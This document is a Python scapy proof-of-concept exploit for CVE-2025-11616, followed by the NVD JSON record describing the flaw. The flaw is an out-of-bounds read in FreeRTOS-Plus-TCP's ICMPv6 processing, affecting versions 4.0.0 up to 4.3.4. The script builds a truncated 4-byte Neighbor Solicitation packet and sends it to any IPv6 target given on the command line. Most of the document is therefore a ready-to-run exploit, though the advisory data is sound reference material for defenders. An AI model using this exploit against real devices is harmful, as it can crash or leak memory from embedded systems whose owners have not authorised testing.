CVE-2025-11616

# CVE-2025-11616 - FreeRTOS-Plus-TCP ICMPv6 OOB Read PoC # This PoC demonstrates crafting a malformed ICMPv6 packet # that triggers an out-of-bounds read in FreeRTOS-Plus-TCP from scapy.all import IPv6, ICMPv6EchoRequest, Raw, send, conf # Disable verbose output conf.verb = 0 def craft_malformed_icmpv6(target_ip, src_ip="fe80::1"): """ Craft a malformed ICMPv6 packet with insufficient length to trigger OOB read in FreeRTOS-Plus-TCP's ICMPv6 processing code. The vulnerability is triggered when an ICMPv6 packet has a valid message type but a payload smaller than the expected minimum size for that message type. """ # Create a minimal ICMPv6 Echo Request with truncated payload # Normal ICMPv6 Echo Request requires at least 8 bytes header # We craft a packet with type indicating a larger expected structure # but with insufficient actual data length # ICMPv6 Type 128 = Echo Request (requires 8 bytes header + variable data) # We send a packet that claims to be a larger ICMPv6 type # but with truncated payload # Build the malformed packet manually # Type: 135 (Neighbor Solicitation) - normally requires 24+ bytes # But we provide only minimal data to trigger OOB read malformed_type = 135 # Neighbor Solicitation malformed_code = 0 # Create raw ICMPv6 with truncated data # Only provide 4 bytes instead of expected minimum raw_icmpv6 = bytes([malformed_type, malformed_code, 0x00, 0x00]) # Construct IPv6 packet with the malformed ICMPv6 payload packet = IPv6(src=src_ip, dst=target_ip) / Raw(load=raw_icmpv6) return packet def exploit(target_ip): """Send the malformed ICMPv6 packet to trigger the vulnerability""" pkt = craft_malformed_icmpv6(target_ip) print(f"[*] Sending malformed ICMPv6 packet to {target_ip}") print(f"[*] Packet type: Neighbor Solicitation (135)") print(f"[*] Payload size: 4 bytes (expected: 24+ bytes)") send(pkt) print("[+] Packet sent successfully") if __name__ == "__main__": import sys if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_ipv6_address>") sys.exit(1) target = sys.argv[1] exploit(target)

{"cve": {"id": "CVE-2025-11616", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.080", "lastModified": "2025-10-31T18:22:59.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's ICMPv6 packet processing code can lead to an out-of-bounds read when receiving ICMPv6 packets of certain message types which are smaller than the expected size. These issues only affect applications using IPv6.\n\nUsers should upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-8j9h-xjm9-8j6j", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}